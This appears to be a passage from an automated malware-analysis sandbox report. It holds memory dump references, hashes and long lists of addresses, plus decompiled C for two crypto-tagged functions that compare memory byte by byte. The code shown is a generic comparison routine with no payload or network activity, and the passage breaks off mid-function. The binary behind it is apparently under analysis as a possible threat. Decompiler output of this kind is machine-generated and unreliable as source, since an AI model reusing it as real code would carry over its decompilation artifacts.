0x00a3d45e
0x00a3d4e5
0x00a3d4e7
0x00a3d4e9
0x00000000
0x00000000
0x00a3d4f5
0x00a3d57d
0x00a3d57f
0x00a3d581
0x00000000
0x00000000
0x00a3d587
0x00a3d58d
0x00a3d614
0x00a3d616
0x00a3d618
0x00000000
0x00000000
0x00a3d61e
0x00a3d624
0x00a3d6ab
0x00a3d6ad
0x00a3d6af
0x00000000
0x00000000
0x00a3d6bd
0x00a3d6bf
0x00a3d6d7
0x00a3d6df
0x00a3d6e1
0x00a3ce3a
0x00a3ce42
0x00a3ce44
0x00a3ce51
0x00a3ce51
0x00000000
0x00a3ce44
0x00a3d6ee
0x00a3ce34
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3ce34
0x00a3d6c8
0x00a3d6d1
0x00000000
0x00000000
0x00000000
0x00a3d6d1
0x00a3d631
0x00a3d633
0x00a3d64b
0x00a3d653
0x00a3d655
0x00a3d66d
0x00a3d675
0x00a3d677
0x00a3d68f
0x00a3d697
0x00a3d699
0x00a3d6a2
0x00a3d6a2
0x00000000
0x00a3d699
0x00a3d680
0x00a3d689
0x00000000
0x00000000
0x00000000
0x00a3d689
0x00a3d65e
0x00a3d667
0x00000000
0x00000000
0x00000000
0x00a3d667
0x00a3d63c
0x00a3d645
0x00000000
0x00000000
0x00000000
0x00a3d645
0x00a3d59a
0x00a3d59c
0x00a3d5b4
0x00a3d5bc
0x00a3d5be
0x00a3d5d6
0x00a3d5de
0x00a3d5e0
0x00a3d5f8
0x00a3d600
0x00a3d602
0x00a3d60b
0x00a3d60b
0x00000000
0x00a3d602
0x00a3d5e9
0x00a3d5f2
0x00000000
0x00000000
0x00000000
0x00a3d5f2
0x00a3d5c7
0x00a3d5d0
0x00000000
0x00000000
0x00000000
0x00a3d5d0
0x00a3d5a5
0x00a3d5ae
0x00000000
0x00000000
0x00000000
0x00a3d5ae
0x00a3d503
0x00a3d505
0x00a3d51d
0x00a3d525
0x00a3d527
0x00a3d53f
0x00a3d547
0x00a3d549
0x00a3d561
0x00a3d569
0x00a3d56b
0x00a3d574
0x00a3d574
0x00000000
0x00a3d56b
0x00a3d552
0x00a3d55b
0x00000000
0x00000000
0x00000000
0x00a3d55b
0x00a3d530
0x00a3d539
0x00000000
0x00000000
0x00000000
0x00a3d539
0x00a3d50e
0x00a3d517
0x00000000
0x00000000
0x00000000
0x00a3d517
0x00a3d46b
0x00a3d46d
0x00a3d485
0x00a3d48d
0x00a3d48f
0x00a3d4a7
0x00a3d4af
0x00a3d4b1
0x00a3d4c9
0x00a3d4d1
0x00a3d4d3
0x00a3d4dc
0x00a3d4dc
0x00000000
0x00a3d4d3
0x00a3d4ba
0x00a3d4c3
0x00000000
0x00000000
0x00000000
0x00a3d4c3
0x00a3d498
0x00a3d4a1
0x00000000
0x00000000
0x00000000
0x00a3d4a1
0x00a3d476
0x00a3d47f
0x00000000
0x00000000
0x00000000
0x00a3d47f
0x00a3d3d4
0x00a3d3d6
0x00a3d3ee
0x00a3d3f6
0x00a3d3f8
0x00a3d410
0x00a3d418
0x00a3d41a
0x00a3d432
0x00a3d43a
0x00a3d43c
0x00a3d445
0x00a3d445
0x00000000
0x00a3d43c
0x00a3d423
0x00a3d42c
0x00000000
0x00000000
0x00000000
0x00a3d42c
0x00a3d401
0x00a3d40a
0x00000000
0x00000000
0x00000000
0x00a3d40a
0x00a3d3df
0x00a3d3e8
0x00000000
0x00000000
0x00000000
0x00a3d3e8
0x00a3d33d
0x00a3d33f
0x00a3d357
0x00a3d35f
0x00a3d361
0x00a3d379
0x00a3d381
0x00a3d383
0x00a3d39b
0x00a3d3a3
0x00a3d3a5
0x00a3d3ae
0x00a3d3ae
0x00000000
0x00a3d3a5
0x00a3d38c
0x00a3d395
0x00000000
0x00000000
0x00000000
0x00a3d395
0x00a3d36a
0x00a3d373
0x00000000
0x00000000
0x00000000
0x00a3d373
0x00a3d348
0x00a3d351
0x00000000
0x00000000
0x00000000
0x00a3d29e
0x00a3d2a2
0x00a3d2a6
0x00a3d2a8
0x00a3d2c0
0x00a3d2c0
0x00a3d2c8
0x00a3d2ca
0x00a3d2e2
0x00a3d2e2
0x00a3d2ea
0x00a3d2ec
0x00a3d304
0x00a3d304
0x00a3d30c
0x00a3d30e
0x00a3d317
0x00a3d317
0x00000000
0x00a3d30e
0x00a3d2f2
0x00a3d2f5
0x00a3d2fe
0x00000000
0x00000000
0x00000000
0x00a3d2fe
0x00a3d2d0
0x00a3d2d3
0x00a3d2dc
0x00000000
0x00000000
0x00000000
0x00a3d2dc
0x00a3d2ae
0x00a3d2b1
0x00a3d2ba
0x00000000
0x00000000
0x00000000
0x00a3d2ba
0x00a3ca20
0x00a3ca20
0x00a3d811

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: b7623ef50d826127e682564067f828e36378d5a54eb76d82b332711e43218a12
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: B0C181322151A34ADF2D8739E87403FBAA15AA27B171A176DF4B3DF1C5FE20D524D620

Uniqueness

Uniqueness Score: -1.00%

Function 00A3CA28, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A3CA28(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x00a3ca28
0x00a3ca28
0x00a3ca2e
0x00a3caa5
0x00a3caa7
0x00a3caa9
0x00000000
0x00000000
0x00a3caaf
0x00a3cab5
0x00a3cb3c
0x00a3cb3e
0x00a3cb40
0x00000000
0x00000000
0x00a3cb46
0x00a3cb4c
0x00a3cbd3
0x00a3cbd5
0x00a3cbd7
0x00000000
0x00000000
0x00a3cbdd
0x00a3cbe3
0x00a3cc6a
0x00a3cc6c
0x00a3cc6e
0x00000000
0x00000000
0x00a3cc74
0x00a3cc7a
0x00a3cd01
0x00a3cd03
0x00a3cd05
0x00000000
0x00000000
0x00a3cd11
0x00a3cd99
0x00a3cd9b
0x00a3cd9d
0x00000000
0x00000000
0x00a3cda3
0x00a3cda9
0x00a3ce30
0x00a3ce32
0x00a3ce34
0x00a3ce42
0x00a3ce44
0x00a3ce51
0x00a3ce51
0x00a3ce44
0x00000000
0x00a3ce34
0x00a3cdb6
0x00a3cdb8
0x00a3cdd0
0x00a3cdd8
0x00a3cdda
0x00a3cdf2
0x00a3cdfa
0x00a3cdfc
0x00a3ce14
0x00a3ce1c
0x00a3ce1e
0x00a3ce27
0x00a3ce27
0x00000000
0x00a3ce1e
0x00a3ce05
0x00a3ce0e
0x00000000
0x00000000
0x00000000
0x00a3ce0e
0x00a3cde3
0x00a3cdec
0x00000000
0x00000000
0x00000000
0x00a3cdec
0x00a3cdc1
0x00a3cdca
0x00000000
0x00000000
0x00000000
0x00a3cdca
0x00a3cd1f
0x00a3cd21
0x00a3cd39
0x00a3cd41
0x00a3cd43
0x00a3cd5b
0x00a3cd63
0x00a3cd65
0x00a3cd7d
0x00a3cd85
0x00a3cd87
0x00a3cd90
0x00a3cd90
0x00000000
0x00a3cd87
0x00a3cd6e
0x00a3cd77
0x00000000
0x00000000
0x00000000
0x00a3cd77
0x00a3cd4c
0x00a3cd55
0x00000000
0x00000000
0x00000000
0x00a3cd55
0x00a3cd2a
0x00a3cd33
0x00000000
0x00000000
0x00000000
0x00a3cd33
0x00a3cc87
0x00a3cc89
0x00a3cca1
0x00a3cca9
0x00a3ccab
0x00a3ccc3
0x00a3cccb
0x00a3cccd
0x00a3cce5
0x00a3cced
0x00a3ccef
0x00a3ccf8
0x00a3ccf8
0x00000000
0x00a3ccef
0x00a3ccd6
0x00a3ccdf
0x00000000
0x00000000
0x00000000
0x00a3ccdf
0x00a3ccb4
0x00a3ccbd
0x00000000
0x00000000
0x00000000
0x00a3ccbd
0x00a3cc92
0x00a3cc9b
0x00000000
0x00000000
0x00000000
0x00a3cc9b
0x00a3cbf0
0x00a3cbf2
0x00a3cc0a
0x00a3cc12
0x00a3cc14
0x00a3cc2c
0x00a3cc34
0x00a3cc36
0x00a3cc4e
0x00a3cc56
0x00a3cc58
0x00a3cc61
0x00a3cc61
0x00000000
0x00a3cc58
0x00a3cc3f
0x00a3cc48
0x00000000
0x00000000
0x00000000
0x00a3cc48
0x00a3cc1d
0x00a3cc26
0x00000000
0x00000000
0x00000000
0x00a3cc26
0x00a3cbfb
0x00a3cc04
0x00000000
0x00000000
0x00000000
0x00a3cc04
0x00a3cb59
0x00a3cb5b
0x00a3cb73
0x00a3cb7b
0x00a3cb7d
0x00a3cb95
0x00a3cb9d
0x00a3cb9f
0x00a3cbb7
0x00a3cbbf
0x00a3cbc1
0x00a3cbca
0x00a3cbca
0x00000000
0x00a3cbc1
0x00a3cba8
0x00a3cbb1
0x00000000
0x00000000
0x00000000
0x00a3cbb1
0x00a3cb86
0x00a3cb8f
0x00000000
0x00000000
0x00000000
0x00a3cb8f
0x00a3cb64
0x00a3cb6d
0x00000000
0x00000000
0x00000000
0x00a3cb6d
0x00a3cac2
0x00a3cac4
0x00a3cadc
0x00a3cae4
0x00a3cae6
0x00a3cafe
0x00a3cb06
0x00a3cb08
0x00a3cb20
0x00a3cb28
0x00a3cb2a
0x00a3cb33
0x00a3cb33
0x00000000
0x00a3cb2a
0x00a3cb11
0x00a3cb1a
0x00000000
0x00000000
0x00000000
0x00a3cb1a
0x00a3caef
0x00a3caf8
0x00000000
0x00000000
0x00000000
0x00a3caf8
0x00a3cacd
0x00a3cad6
0x00000000
0x00000000
0x00000000
0x00a3ca30
0x00a3ca30
0x00a3ca37
0x00a3ca39
0x00a3ca4d
0x00a3ca4d
0x00a3ca55
0x00a3ca57
0x00a3ca6b
0x00a3ca6b
0x00a3ca73
0x00a3ca75
0x00a3ca89
0x00a3ca89
0x00a3ca91
0x00a3ca93
0x00a3ca9c
0x00a3ca9c
0x00000000
0x00a3ca93
0x00a3ca7b
0x00a3ca7e
0x00a3ca87
0x00000000
0x00000000
0x00000000
0x00a3ca87
0x00a3ca5d
0x00a3ca60
0x00a3ca69
0x00000000
0x00000000
0x00000000
0x00a3ca69
0x00a3ca3f
0x00a3ca42
0x00a3ca4b
0x00000000
0x00000000
0x00000000
0x00a3ca4b
0x00a3ca20
0x00a3ca20
0x00a3d811

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 4577137f4e05e81c41f3834ca0363178527911c675d33d7eb38d49116f9b54e6
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 45C170326151A30ADF2D8739987413FFAA25AA27F171A176DF4B3EB1C4FE20D5249720

Uniqueness

Uniqueness Score: -1.00%

Function 00A3C610, Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A3C610(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
